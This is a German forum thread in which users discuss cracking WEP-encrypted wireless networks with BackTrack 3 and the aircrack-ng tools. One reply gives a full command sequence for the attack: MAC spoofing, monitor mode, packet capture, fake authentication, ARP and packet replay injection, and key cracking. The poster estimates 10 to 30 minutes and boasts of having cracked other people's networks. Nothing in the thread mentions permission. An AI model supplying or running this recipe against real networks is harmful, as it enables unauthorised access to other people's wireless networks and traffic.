[Mr_Braun]

Hallo Freunde der IT,

ich habe wie folgt ein "Problem".
Seit geraumer Zeit interessiere ich mich für WEP-Cracking. Habe mir dazu schon einige Tutorials durchgelesen und weiß im Grunde genommen wie alles theoretisch! funktioniert.

Nun habe ich allerdings einen auf meinem Notebook einen AtherosAR5007EG-Chipsatz drin, Aircrack unter Windows fällt für einfacherweise somit weg.
Gut.. Ich habe ansonsten Linux Suse 10.3 installiert.
Hatte hierbei schon versucht Kismet+Aircrack zu installieren. Auch wenn meine Linux-Kenntnisse nicht sonderbar die besten sind. (make, makeinstall) habe ich allerdings noch hinbekommen.

Dort scheitert es allerdings an der Konfiguration der config-File, und davon mal abgesehen ich nicht weiß, wie es mit den W-Lan Treibern für diesen Chip unter Suse aussieht..

Nun wollte ich das ganze gerne mal unter Backtrack 3 ausprobieren.
Weiß allerdings nicht, ob das ganze völlig normal als Live-CD (ohne Installation) ausgeführt werden kann? Die Keys speichert er wohl kaum im RAM?
Und wie schaut es aus, wenn ich Suse herunterhauen würde? Backtrack stattdessen installiere? Werden die Configs von kismet, aircrack usw. automatisch eingestellt? Oder sind noch komplexe Befehle in der Shell dann notwendig?


Vielleicht hat der ein oder andere hier einige Erfahrungsberichte oder weiß auch so Rat auf meine vielen Fragen.


Danke im Voraus und
Beste Grüße

Mr_Braun

[patrickh3227]

habe Backtrack 3 auf usb stick

muste mal google benutzen
Bootet über Usb

Also Ich habe ein Wlan netzwerk mit WEP verschlüsselung habe ich in 14 minuten geschaft zu entschlüsseln
Habe auch schon andere netzwerke entschlüsselt

WPA 2 ist nur mit Passwort lieste zu Knacken

hier mal ne anleitung

nur bei intel
---------------------
modprobe -r iwl3945 /////nur Bei Intel eingeben
modprobe ipwraw /////nur Bei Intel eingeben

dan /////der ganze rest
----------------------
airmon-ng stop (device) device = Wlan adapter z.b:wifi0
macchanger--mac 00:11:22:33:44:66 (device) mac adresse ändern
aimon-ng start (device) monitore mode
airodump-ng (device) auswahl von netwerk

1.
airodump-ng -c (channel) -w network.out --bssid (bssid) (device)
(Kanal des netzwerkes) (Mac adresse des netzwerkes) (wlan adapter)

2.
aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:66 -e (essid) (device)
(Mac adresse des netzwerkes) (Name des Netzwerkes) (wlan adapter)

achtung bei (essid) groß und klein schreibung beachten

neues Fenster
3.
aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:66 (device)

neues Fenster
4.
aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b (bssid) -h 00:11:22:33:44:66 (device)

neues Fenster
5.
aircrack -ng -n 128 -b (bssid) network.out-01.cap
oder 64 wen es nicht funtzt

Key wird nach erfolgreichen cracken angezeigt
wen ihr alles richtig eingegeben habt müsten die Packete bei 500/s liegen
100000packet reichen schon aus

Funtzt nicht bei WPA2 also Passwort liste

geschätzte zeit 10-30 minuten bei WEP verschlüsselung

viel Spaß

[patrickh3227]

das ist dazu da um den router mehr pakete schicken zu lassen
du probiere es aus

auf ja drücken

[antirockstar]

Meine 5007EG wird von BT3 bzw. airmon-ng gar nicht erkannt/aufgelistet...

[patrickh3227]

was ist das den für ein ding deine wlan karte oder was meinst du
schaue mal bei aircrack auf die webseite ob deine wlan karte suportet wird

bei mir funtzt back track 3 super mit intel wlan 3945abg

[Tobunator]

Zitat:

Zitat von golum

EDIT: müssen clients verbunden sein?

Aber sicher müssen Clients am W-LAN connected sein und diese müssen auch Traffic erzeugen welchen du "mithören" kannst/musst....

sonst wird das nichts

[Tobunator]

was hast du mit deinem Router genau ausprobiert?

[juli999]

für die die es interessiert, man kann auch slerb traffic erzeugen

siehe: [ Link nur für registrierte Mitglieder sichtbar. Bitte einloggen oder neu registrieren ]

ohne dass ein client verbunden ist ...